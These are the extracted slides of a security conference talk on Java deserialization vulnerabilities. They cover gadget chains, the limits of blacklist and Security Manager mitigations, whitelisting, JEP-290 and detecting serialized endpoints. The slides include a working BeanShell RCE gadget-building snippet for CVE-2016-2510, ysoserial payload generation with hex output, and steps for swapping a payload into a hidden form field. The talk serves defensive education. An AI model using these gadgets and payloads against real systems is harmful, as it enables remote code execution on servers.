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CON3044 JVM Deserialization Attacks: Separating the Truth from the Hype Alvaro Muñoz (@pwntester) Christian Schneider (@cschneider4711)

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Quick Poll Deserializing untrusted data will get you compromised in the worst case ... and will crash your JVM in the best. Spoiler Alert: Who has heard about the news (in 2015) about dangerous Java deserialization vulnerabilities? How many of you have checked and/or patched their systems in some way? Who thinks her/his systems are not affected?

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Why this talk? 3

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Why this talk? • Java deserialization attacks have been known for years by the security community • News around Apache Commons-Collections made the topic available to a broader audience in 2015 • Some inaccurate advice to protect your applications is making the rounds • In this talk we’ll demonstrate the weakness of this advice by … • … showing you new remote code execution risks • … showing you how attackers can bypass these • We’ll give advice how to spot this vulnerability and its gadgets during … • … code reviews (i.e. showing you what to look for) • … pentests (i.e. how to generically test for such issues) 4

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Java (De)serialization 101 –Taking a snapshot of an object graph as a byte stream that can be used to reconstruct the object graph to its original state –Only object data is serialized, not the code –The code sits on the Classpath of the deserializing end Object Graph Object Graph ACED 0005 …

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Where Is It Used? –Communication –Remote/Inter process Communications (RPC/IPC) –Message brokers, queues –HTTP cookies and parameters –Session, tokens, client data –Local/Network caching –Clustering –Database/Persistence –…

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Attack Surface for Java Deserialization • Usages of Java serialization in protocols/formats/products: • RMI (Remote Method Invocation) • JMX (Java Management Extension) • JMS (Java Messaging System) • Spring Service Invokers • HTTP, JMS, RMI, etc. • Apache SOLR (Serialization for RPC) • Some Cisco products • Some F5 products • Some VMware products • Android • AMF (Action Message Format) • JSF ViewState • WebLogic T3 • Apache Shiro (via Cookie) • Apache HBase (RPC) • Apache Camel • Apache JCS • … any many more 7

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Attacks via internal interfaces 8

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Attacks via external interfaces 9 When Java serialization data is read back from client (browser) via Cookies etc.

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Customizing Serialization 10 public class User implements Serializable { private String secret; public User (String secret) { this.secret = secret; } }

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Customizing Serialization public class User implements Serializable { private String secret; public User (String secret) { this.secret = secret; } private void writeObject(ObjectOutputStream stream) throws … { stream.writeObject( Crypto.encrypt(secret) ); } private void readObject(ObjectInputStream stream) throws … { secret = Crypto.decrypt( (String)stream.readObject() ); } } 11

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Serialized form > java Serialize && cat user.ser | xxd 00000000: aced 0005 7372 0004 5573 6572 5b88 b745[..E 00000010: 6511 8500 0300 014c 0006 7365 6372 6574 e......L..secret 00000020: 7400 124c 6a61 7661 2f6c 616e 672f 5374 t..Ljava/lang/St 00000030: 7269 6e67 3b78 7074 0006 6a72 6e72 7074 ring;xpt..jrnrptx 00000040: 78 12

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Abusing “Deserialization Callbacks” • Abusing deserialization callbacks of gadgets which have dangerous code: • Attacker controls member fields’ values of serialized object • Upon deserialization .readObject() / .readResolve() is invoked • Aside from the classic ones also lesser-known "magic methods" help: • .validateObject() as part of validation (which does not prevent attacks) • .readObjectNoData() upon deserialization conflicts • .finalize() as part of GC (even after errors) • Works also for Externalizable’s .readExternal()

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Toy Example public class RubberDucky implements Serializable { private String command; public final Object readObject(ObjectInputStream ois) throws OptionalDataException, ClassNotFoundException, IOException { ois.defaultReadObject(); Runtime.getRuntime().exec(command); } }

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Toy Example public class RubberDucky implements Serializable { private String command; public final Object readObject(ObjectInputStream ois) throws OptionalDataException, ClassNotFoundException, IOException { ois.defaultReadObject(); Runtime.getRuntime().exec(command); } } E.g. calc.exe

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Toy Example public class RubberDucky implements Serializable { private String command; public final Object readObject(ObjectInputStream ois) throws OptionalDataException, ClassNotFoundException, IOException { ois.defaultReadObject(); Runtime.getRuntime().exec(command); } }

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Toy Example public class RubberDucky implements Serializable { private String command; public final Object readObject(ObjectInputStream ois) throws OptionalDataException, ClassNotFoundException, IOException { ois.defaultReadObject(); Runtime.getRuntime().exec(command); } }

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OK, but now some real Gadgets please… • Real world exploits use multiple steps • Build a chain of gadgets consisting of • Classes commonly available in target’s ClassPath • Many already existing • Our research found some interesting new… • Just the class sitting on target’s ClassPath is enough • ...when application has a deserialization endpoint 24

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“Apache Commons Collections” Gadget Chain ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() LazyMap.get() ChainedTransformer.transform() ConstantTransformer.transform() InvokerTransformer.transform() Method.invoke() Class.getMethod() InvokerTransformer.transform() Method.invoke() Runtime.getRuntime() InvokerTransformer.transform() Method.invoke() Class.getMethod() InvokerTransformer.transform() Method.invoke() Runtime.exec() 25 Credits: Chris Frohoff (@frohoff) Gabriel Lawrence (@gebl)

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It‘s not only related to dangerous code in magic methods ... "dangerous code" for the attacker to influence? 26

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Jumping around with Proxies 27 Class field1 field2 … method1 method2 Interface method1 method2 Invocation Handler Custom code method2 Proxy

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How attackers abuse InvocationHandler (IH) Gadgets • Attacker steps upon serialization: • Attacker controls member fields of IH gadget, which has dangerous code • IH (as part of Dynamic Proxy) gets serialized by attacker as field on which an innocuous method is called from "magic method" (of class to deserialize) • Application steps upon deserialization: • "Magic Method" of "Trigger Gadget" calls innocuous method on an attacker controlled field • This call is intercepted by proxy (set by attacker as this field) and dispatched to IH • Other IH-like types exist aside from java.lang.reflect.InvocationHandler • javassist.util.proxy.MethodHandler (no requirement to implement interface) • org.jboss.weld.bean.proxy.MethodHandler 28

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public class TriggerGadget implements Serializable { private Comparator comp; … public final Object readObject(ObjectInputStream ois) throw Exception { ois.defaultReadObject();"foo", "bar"); } } Toy Example: Trigger Gadget 29 Attacker controls this field, so it can set it to anything implementing java.util.Comparator … anything, even a Proxy Proxy will intercept call to “compare()” and dispatch it to its Invocation Handler 29

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Toy Example: Dangerous IH 30 Payload execution 30 public class DangerousHandler implements Serializable, InvocationHandler { private String command; … public Object invoke(Object proxy, Method method, Object[] args) { Runtime.getRuntime().exec(command); } }

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New RCE gadget in BeanShell (CVE-2016-2510) • bsh.XThis$Handler • Serializable • InvocationHandler • Upon method interception custom BeanShell code will be called • Almost any Java code can be included in the payload • In order to invoke the payload a trigger gadget is needed to dispatch the execution to the InvocationHandler invoke method 31

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32 String payload = "compare(Object foo, Object bar) {" + "new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;}"; // Create BeanShell Interpreter Interpreter i = new Interpreter(); i.eval(payload); // Create Proxy/InvocationHandler to be a "Comparator" using Interpreter XThis xt = new XThis(i.getNameSpace(), i); InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class>[]{Comparator.class}, handler); // Prepare Trigger Gadget (will call during deserialization) PriorityQueue priorityQueue = new PriorityQueue<>(2, comparator); Object[] queue = new Object[] {1,1}; setFieldValue(priorityQueue, "queue", queue); setFieldValue(priorityQueue, "size", 2); RCE gadget in BeanShell (CVE-2016-2510)

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Fixed in products from IBM, RedHat & Apache 33

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Payload Generator "ysoserial“ (by @frohoff & @gebl) 34

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> java -jar ysoserial.jar Y SO SERIAL? Usage: java -jar ysoserial.jar [payload type] '[shell command to execute]' Available payload types: BeanShell C3P0 CommonsBeanutils CommonsCollections FileUpload Groovy Hibernate JRMPClient JRMPListener JSON Jdk7u2 Jython Myfaces ROME Spring Gadgets available in ysoserial 35 …

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Payload generation via ysoserial 36 > java -jar ysoserial.jar BeanShell 'calc' | xxd 0000000: aced 0005 7372 0017 6a61 7661 2e75 7469 0000010: 6c2e 5072 696f 7269 7479 5175 6575 6594 l.PriorityQueue. 0000020: da30 b4fb 3f82 b103 0002 4900 0473 697a .0..?.....I..siz 0000030: 654c 000a 636f 6d70 6172 6174 6f72 7400 eL..comparatort. 0000040: 164c 6a61 7661 2f75 7469 6c2f 436f 6d70 .Ljava/util/Comp 0000050: 6172 6174 6f72 3b78 7000 0000 0273 7d00 arator;xp....s}. 0000060: 0000 0100 146a 6176 612e 7574 696c 2e43 0000070: 6f6d 7061 7261 746f 7278 7200 176a 6176 omparatorxr..jav 0000080: 612e 6c61 6e67 2e72 6566 6c65 6374 2e50 a.lang.reflect.P 0000090: 726f 7879 e127 da20 cc10 43cb 0200 014c roxy.'. ..C....L 00000a0: 0001 6874 0025 4c6a 6176 612f 6c61 6e67 00000b0: 2f72 6566 6c65 6374 2f49 6e76 6f63 6174 /reflect/Invocat 00000c0: 696f 6e48 616e 646c 6572 3b78 7073 7200 ionHandler;xpsr. 00000d0: 1162 7368 2e58 5468 6973 2448 616e 646c .bsh.XThis$Handl

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Some examples of recent endpoints • PayPal was vulnerable to "Untrusted Java Deserialization", which means "Remote Code Execution" • Found as part of bug-bounty in December 2015 by Mark Litchfield (rewarded by PayPal with $ 15.000) • Independently found two days later by Michael Stepankin (still rewarded by PayPal with $ 5.000 even as duplicate) • Fixed within 48 hours by PayPal (respect!)

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PayPal Manager Form Submit … 38 Reported by Mark Litchfield & Michael Stepankin

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… which includes some Base64 as part of some hidden form value Reported by Mark Litchfield & Michael Stepankin

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… which is some serialized Java object Reported by Mark Litchfield & Michael Stepankin

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Exploiting such Deserialization Endpoints… • Create "command to execute on server" payload with ysoserial • Base64 encode it (if required by endpoint) • Use as replacement for original Java deserialization value • i.e. hidden form field’s value in submit in PayPal scenario • ;-)

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Mitigation Advices Analysis 42

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Mitigation Advice #1: Remove Gadget 43

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Tons of Gadgets • Spring AOP (by Wouter Coekaerts in 2011) • First public exploit: (by @pwntester in 2013) • Commons-fileupload (by Arun Babu Neelicattu in 2013) • Groovy (by cpnrodzc7 / @frohoff in 2015) • Commons-Collections (by @frohoff and @gebl in 2015) • Spring Beans (by @frohoff and @gebl in 2015) • Serial DoS (by Wouter Coekaerts in 2015) • SpringTx (by @zerothinking in 2016) • JDK7 (by @frohoff in 2016) • Beanutils (by @frohoff in 2016) • Hibernate, MyFaces, C3P0, net.sf.json, ROME (by M. Bechler in 2016) • Beanshell, Jython, lots of bypasses (by @pwntester and @cschneider4711 in 2016) • JDK7 Rhino (by @matthias_kaiser in 2016) • ... 44

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“Golden” JRE Gadgets • A Gadget chain that only require classes in the JRE will highly increase attacker success ratio. • No dependencies required! • Golden JRE Gadgets known so far: • Rhino by Matthias Kaiser. Up to JRE 7u13 • AnnotationInvocationHandler I by Chris Frohoff. Up to JRE 7u21 • AnnotationInvocationHandler II by Alvaro Munoz. Up to JRE 8u20 • CORBA Stubs by Alexandr Mirosh and Alvaro Munoz. • Works on every JRE version, but requires a Security Manager to be installed 45

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Mitigation Advice #1: Remove Gadget 46

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47 Attackers can defer execution: • finalize() method • Play with expected types (i.e return valid types for the cast which fire later) If you can uninstall/restore the Security Manager or refresh the policy, attackers might be able to do it Mitigation Advice #2: AdHoc Security Manager

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48 Mitigation Advice #2: AdHoc Security Manager Attackers can defer execution: • finalize() method • Play with expected types (i.e return valid types for the cast which fire later) If you can uninstall/restore the Security Manager or refresh the policy, attackers might be able to do it

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Mitigation Advice #3: Defensive Deserialization 49 class DefensiveObjectInputStream extends ObjectInputStream { @Override protected Class> resolveClass(ObjectStreamClass cls) throws … { String className = cls.getName(); if ( /* CHECK CLASS NAME AGAINST ALLOWED/DISALLOWED TYPES */) { throw new InvalidClassException("Unexpected serialized class", className); } return super.resolveClass(cls); } }

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How did vendors handle this recently? 50 Vendor / Product Type of Protection Atlassian Bamboo Removed Usage of Serialization Apache ActiveMQ Defensive Deserialization Whitelist Apache Batchee Defensive Deserialization Blacklist + optional Whitelist Apache JCS Defensive Deserialization Blacklist + optional Whitelist Apache openjpa Defensive Deserialization Blacklist + optional Whitelist Apache Owb Defensive Deserialization Blacklist + optional Whitelist Apache TomEE Defensive Deserialization Blacklist + optional Whitelist ********** (still to be fixed) Defensive Deserialization Blacklist

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Con: Blacklists may be bypassed • New gadget type to bypass ad-hoc look-ahead ObjectInputStream blacklist protections: • During deserialization of the object graph, a new immaculate unprotected ObjectInputStream will be instantiated • Attacker can provide any arbitrary bytes for unsafe deserialization • Bypass does not work for cases where ObjectInputStream is instrumented 51 public class NestedProblems implements Serializable { private byte[] bytes … ; … private void readObject(ObjectInputStream in) throws … { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); ois.readObject(); } }

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Is this for real or is this just fantasy? 52 Currently we found many bypass gadgets: JRE: 2 Third Party Libraries: − Apache libraries: 6 − Spring libraries: 1 − Other popular libraries: 2 SerialKiller: Bypass Gadget Collection: Application Servers: − WildFly (JBoss): 2 − IBM WebSphere: 15 − Oracle WebLogic: 5 − Apache TomEE: 5 − Apache Tomcat: 2 − Oracle GlassFish: 2

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Example: Bypass AdHoc SecurityManager & Blacklists finalize() > dispose() > closeClient() 53 private void closeClient() { // Connect to the data server. Socket socket = connectToServer(); // Get the socket output stream and wrap an object output stream around it. OutputStream out = null; ObjectOutputStream objectOut = null; ObjectInputStream objectIn = null; try { out = socket.getOutputStream(); objectOut = new ObjectOutputStream(out); objectIn = new ObjectInputStream( socket.getInputStream() ); } catch (IOException e) { ... } objectIn.readObject();

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Con: Whitelists stills vulnerable to Denial-of-Service attacks • SerialDOS by Wouter Coekaerts • HashSet Billion-Laughs Style • jInfinity by Arshan Dabirsiaghi • Size-uninitialized StringBuilder may be abused by huge strings to allocate a large amount of growing character arrays • OIS-DOS by Tomáš Polešovský • Heap overflow when deserializing specially crafted nested ArrayLists, HashMaps or Object arrays • Hashtable collision • Uses an Integer overflow to force underlying array to be length 1 and so creating collisions when adding items with same hashCode • HashMap collision • Number of buckets is directly controllable by attacker • Official response: Won’t fix: Serialization should only be used in trusted environments 54

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Mitigation Advice #3: Defensive Deserialization 55 class DefensiveObjectInputStream extends ObjectInputStream { @Override protected Class> resolveClass(ObjectStreamClass cls) throws … { String className = cls.getName(); if ( /* CHECK CLASS NAME AGAINST ALLOWED/DISALLOWED TYPES */) { throw new InvalidClassException("Unexpected serialized class", className); } return super.resolveClass(cls); } }

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It’s not only about direct Java deserialization 56

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XStream • XStream • Serialize/Deserialize to/from XML • If object being deserialized contains a Java deserialization callback (eg: readObject), it will get called by XStream • Same gadgets can normally be used with XStream • More gadgets are available to attackers since XStream does not require Serializable interface to be implemented. • XStream implemented a blacklist/whitelist protection • Unfortunately developers are not fully aware and still use unprotected or only blacklisted XStream instances • Attackers can use Bypass gadgets to lunch pure Java deserialization attacks 57

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JVM Languages: Scala & Groovy 58 import object SerializationDemo extends App { val ois = new ObjectInputStream( new FileInputStream(“exploit.ser") ) val o = ois.readObject() ois.close() } import* File exploit = new File('exploit.ser') try { def is = exploit.newObjectInputStream(this.class.classLoader) is.eachObject { println it } } catch (e) { throw new Exception(e) } finally { is?.close() } Source code:

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What to do then? 59

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How to Harden Your Applications? DO NOT DESERIALIZE UNTRUSTED DATA!! When architecture permits it: • Use other formats instead of serialized objects: JSON, XML, etc. • But be aware of XML-based deserialization attacks (XStream, XmlDecoder, etc.) As second-best option: Use defensive deserialization with look-ahead OIS with a strict whitelist • Don’t rely on gadget-blacklisting alone! • You can build the whitelist with OpenSource agent SWAT ( Serial Whitelist Application Trainer: ) • Prefer an agent-based instrumenting of ObjectInputStream towards LAOIS • Scan your own whitelisted code for potential gadgets • Still be aware of DoS scenarios 60

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Apache Commons-IO ValidatingObjectInputStream (2.5) 61

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Apache Commons-IO ValidatingObjectInputStream (2.5) 62 Do NOT use black lists! X

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Best solution? J 63 Status: Closed / Withdrawn

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Future Looks Bright 64 Status: Targeted

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JEP-290: What is in there for us? • Provide a flexible mechanism to narrow the classes that can be deserialized from any class available to an application down to a context-appropriate set of classes. • Provide metrics to the filter for graph size and complexity during deserialization to validate normal graph behaviors. • Provide a mechanism for RMI-exported objects to validate the classes expected in invocations. • The filter mechanism must not require subclassing or modification to existing subclasses of ObjectInputStream. • Define a global filter that can be configured by properties or a configuration file. 65 Whitelist defensive deserialization Denial of Service mitigation Secure RMI Backwards compatible, Catch‘em all! Configurable

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Finding Vulnerabilities & Gadgets 66

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Finding Deserialization Endpoints • Check your endpoints for those accepting (untrusted) serialized data • Find calls to: • ObjectInputStream.readObject() • ObjectInputStream.readUnshared() • Where InputStream is attacker-controlled. For example: • May happen in library code like JMS, JMX, RMI, Queues, Brokers, Spring HTTPInvokers, etc. InputStream is = request.getInputStream(); ObjectInputStream ois = new ObjectInputStream(is); ois.readObject();

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… reached by: – – – – – – java.lang.Object.finalize() – Serializable InvocationHandlers – … Finding Gadgets in a Haystack Look for interesting method calls … – java.lang.reflect.Method.invoke() – – – – – – javax.naming.Context.lookup() – … • Check your code for potential gadgets, which could be used in deserialization • "Gadget Space" is too big. Typical app-server based deployments have hundreds of JARs • SAST tools such as HPE Fortify SCA might help

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Passive Deserialization Endpoint Detection • Requests (or any network traffic) carrying serialized Java objects: • Easy to spot due to magic bytes at the beginning: 0xAC 0xED … • Some web-apps might use Base64 to store serialized data in Cookies, etc.: rO0AB … • Be aware that compression could’ve been applied before Base64 • 0x1F8B 0x0800 … • H4sIA … • Tools • Use professional scanners (e.g. HPE WebInspect) for enterprise-level scans • Use free interception proxies (e.g. OWASP ZAP, Burp) to passively scan for Java serialization • Use network sniffers (e.g. Wireshark) for network traffic

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Apply what you have learned today Next weeks you should: • Identify your critical applications’ exposure to untrusted data that gets deserialized • For already reported vulnerable products, ensure to apply patches • Configure applications with whitelists where possible In the first few months following this presentation you should: • If possible switch the deserialization to other formats (JSON, etc.), or • Use defensive deserialization with a strict whitelist Within six months to one year you should: • Use DAST to actively scan for deserialization vulnerabilities as part of your process • Apply SAST techniques to search for attacker-helping gadgets • Extend this analysis also to non-critical applications 70

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Thank you! Alvaro Muñoz, @pwntester [email protected] Christian Schneider, @cschneider4711 [email protected] 72 Perils of Java Deserialization Whitepaper curity-Research/The-perils-of- Java-deserialization/ba- p/6838995#.V5Y-gZPjjdQ